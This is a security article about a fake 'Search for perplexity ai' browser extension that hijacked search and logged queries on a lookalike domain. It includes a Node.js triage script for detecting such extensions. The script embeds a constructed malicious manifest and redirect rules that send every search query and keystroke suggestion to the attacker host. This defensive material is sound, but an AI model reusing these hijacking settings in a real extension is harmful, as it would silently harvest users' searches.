A troubling trend is taking hold: the trusted names of popular AI tools are being turned against the very people who search for them. Microsoft analysts recently documented a malicious browser extension posing as the well-known AI search engine Perplexity AI. Titled “Search for perplexity ai,” it was crafted to mirror the look and feel of a legitimate productivity extension. By operating under a borrowed identity, it exploited the trust users place in recognizable brands, so an ordinary user had no reason to suspect that their browser was compromised from the moment the extension was installed.
At the technical heart of the operation was an abuse of capabilities that Chromium-based browsers legitimately grant to extensions. Once installed, the extension did not just sit on the toolbar; it quietly replaced the browser’s default search provider. The interference was both deep and silent: every query a user submitted was routed through an attacker-controlled server before being forwarded to a legitimate search engine such as Google or Bing. And because Chromium also sends the contents of the address bar to the configured provider’s suggestion endpoint as the user types, even partially typed queries left the machine before the “Enter” key was ever pressed. Since the final results appeared on a familiar search page, the victim saw a seamless, “normal” browsing experience while their data was harvested in the background.
What sets this threat apart from the crude “search hijacker” malware of the past is its use of modern browser features to stay invisible. Rather than triggering clunky, visible page redirects that would alert a user, the extension relied on browser-native extension APIs, so the rerouting happened inside the browser’s own request handling and blended into daily internet use. The extension was also backed by a purpose-built server-side infrastructure: for every request, the HTTP headers, the client IP address and the User-Agent string were logged. This confirmed that the operation was not an accidental glitch but a deliberate, well-engineered system designed for long-term data collection and user profiling.
The deception ran deeper through the lookalike domain “perplexity-ai[.]online.” With the browser configured to treat this domain as its default search provider, every character typed into the address bar was delivered to, and logged on, the attackers’ private infrastructure. Broad network permissions let the extension monitor, redirect and inspect traffic at a granular level. To compound matters, the criminals added a deceptive “onboarding” page that mimicked a professional product setup flow. The tactic builds a false sense of legitimacy: the user believes they are setting up a helpful new AI tool while the software settles into the browser and begins its surveillance.
The threat’s modular design also reveals a concerning degree of foresight on the part of its creators. Only the Perplexity-specific ruleset was active at the time of discovery, but researchers found dormant rulesets targeting Google and Bing as well, which the attackers could have switched on to extend the same interception to those search engines with minimal effort and no new installation. Google has since removed the extension from the Chrome Web Store following responsible disclosure, but the incident is a stark reminder of how exposed browser environments are to these “AI-themed” social engineering campaigns.
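To make the mechanics described above concrete, here is an added example (not code from the article or from Microsoft’s analysis) in Node.js that statically triages an unpacked Chromium extension for exactly this pattern: a search_provider entry under the manifest’s chrome_settings_overrides pointing at an unexpected host, a suggest_url that leaks keystrokes before Enter, and declarativeNetRequest redirect rulesets, including disabled ones of the kind the dormant Google and Bing rules represent. The manifest and rule files are constructed for the example; perplexity-ai.online is the domain the article names, while every rule id, file name, URL path and the allowlist of expected search hosts are assumptions.

```javascript
// Added example, not code from the article or from Microsoft's analysis:
// static triage of an unpacked Chromium extension for the search-hijacking
// pattern described above. The manifest and rule files are constructed to
// resemble the described extension; perplexity-ai.online is the domain the
// article names, and every rule id, file name and URL path is hypothetical.

// Hosts we would expect a legitimate search helper to send queries to.
// Assumption: this allowlist is the reviewer's, not something Chromium enforces.
const ALLOWED_SEARCH_HOSTS = new Set([
  'www.google.com', 'www.bing.com', 'duckduckgo.com', 'www.perplexity.ai',
]);

// Builds a declarativeNetRequest redirect rule that rewrites a search URL
// matching `regexFilter` to `substitution` (\1 carries the captured query).
function redirectRule(id, regexFilter, substitution) {
  return {
    id, priority: 1,
    action: { type: 'redirect', redirect: { regexSubstitution: substitution } },
    condition: { regexFilter, resourceTypes: ['main_frame'] },
  };
}

// Constructed manifest.json. chrome_settings_overrides.search_provider is the
// mechanism an extension uses to replace the default search engine; suggest_url
// is what makes partially typed queries leave the machine before Enter.
const sampleManifest = {
  manifest_version: 3,
  name: 'Search for perplexity ai',
  permissions: ['declarativeNetRequest'],
  host_permissions: ['<all_urls>'],
  chrome_settings_overrides: {
    search_provider: {
      name: 'Perplexity', keyword: 'perplexity', is_default: true,
      search_url: 'https://perplexity-ai.online/search?q={searchTerms}',
      suggest_url: 'https://perplexity-ai.online/suggest?q={searchTerms}',
    },
  },
  declarative_net_request: {
    rule_resources: [
      { id: 'perplexity', enabled: true, path: 'rules_perplexity.json' },
      { id: 'google', enabled: false, path: 'rules_google.json' }, // dormant
      { id: 'bing', enabled: false, path: 'rules_bing.json' },     // dormant
    ],
  },
};

// Constructed static rule files, keyed by the path the manifest references.
const sampleRuleFiles = {
  'rules_perplexity.json': [redirectRule(1,
    '^https://www\\.perplexity\\.ai/search\\?q=([^&]*)',
    'https://perplexity-ai.online/r?src=pplx&q=\\1')],
  'rules_google.json': [redirectRule(1,
    '^https://www\\.google\\.com/search\\?q=([^&]*)',
    'https://perplexity-ai.online/r?src=google&q=\\1')],
  'rules_bing.json': [redirectRule(1,
    '^https://www\\.bing\\.com/search\\?q=([^&]*)',
    'https://perplexity-ai.online/r?src=bing&q=\\1')],
};

// Hostname of a URL template, or null if it does not parse.
function hostOf(urlTemplate) {
  try { return new URL(urlTemplate).hostname; } catch { return null; }
}

// Returns a list of findings ({ kind, detail, host?, ruleset? }). Disabled
// rulesets are inspected too: a dormant ruleset can be switched on later by
// the extension's own code without any new installation or store review.
function triageExtension(manifest, ruleFiles) {
  const findings = [];
  const sp = manifest.chrome_settings_overrides?.search_provider;
  if (sp) {
    for (const key of ['search_url', 'suggest_url']) {
      const host = hostOf(sp[key] || '');
      if (host && !ALLOWED_SEARCH_HOSTS.has(host)) {
        const what = key === 'suggest_url' ? 'every omnibox keystroke' : 'every submitted query';
        findings.push({ kind: `${key}_override`, host, detail: `${key} sends ${what} to ${host}` });
      }
    }
  }
  for (const res of manifest.declarative_net_request?.rule_resources || []) {
    for (const rule of ruleFiles[res.path] || []) {
      if (rule.action?.type !== 'redirect') continue;
      const r = rule.action.redirect || {};
      const host = hostOf(r.url || r.regexSubstitution || '');
      if (!host || ALLOWED_SEARCH_HOSTS.has(host)) continue;
      const pattern = rule.condition?.regexFilter || rule.condition?.urlFilter || '*';
      findings.push({
        kind: res.enabled ? 'active_redirect' : 'dormant_redirect', ruleset: res.id, host,
        detail: `${res.enabled ? 'active' : 'disabled'} ruleset "${res.id}" redirects ${pattern} to ${host}`,
      });
    }
  }
  const perms = manifest.permissions || [];
  const hasDnr = perms.includes('declarativeNetRequest') || perms.includes('declarativeNetRequestWithHostAccess');
  if (hasDnr && (manifest.host_permissions || []).includes('<all_urls>')) {
    findings.push({ kind: 'broad_network_reach', detail: 'declarativeNetRequest combined with <all_urls> host access' });
  }
  return findings;
}

for (const f of triageExtension(sampleManifest, sampleRuleFiles)) console.log(`[${f.kind}] ${f.detail}`);
```

To run this against a real unpacked extension, load its manifest.json and each file named under rule_resources with fs.readFileSync and pass them in, with the allowlist set to whatever search hosts your organization sanctions. Treat a disabled ruleset as seriously as an active one: an extension can enable it at any time with chrome.declarativeNetRequest.updateEnabledRulesets, which is exactly why the dormant Google and Bing rules mattered.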
In an era where AI tools are the latest hot commodity, users must be more vigilant than ever about what software they admit into their browsers. Verify the publisher and the exact Web Store listing of any extension before installing it, review the permissions it requests, and treat any tool that promises to “integrate” AI into the search bar with suspicion. Organizations should enforce browser policies that restrict installations to an approved allowlist (in Chrome and Edge, ExtensionInstallBlocklist set to “*” combined with ExtensionInstallAllowlist, or the finer-grained ExtensionSettings policy), pin the default search engine with the DefaultSearchProvider policies so that it is managed and an extension cannot override it, and monitor outbound traffic for search queries leaving for unexpected hosts. Replacing blind trust with a proactive security mindset is what mitigates the risk posed by these increasingly sophisticated digital shadows.

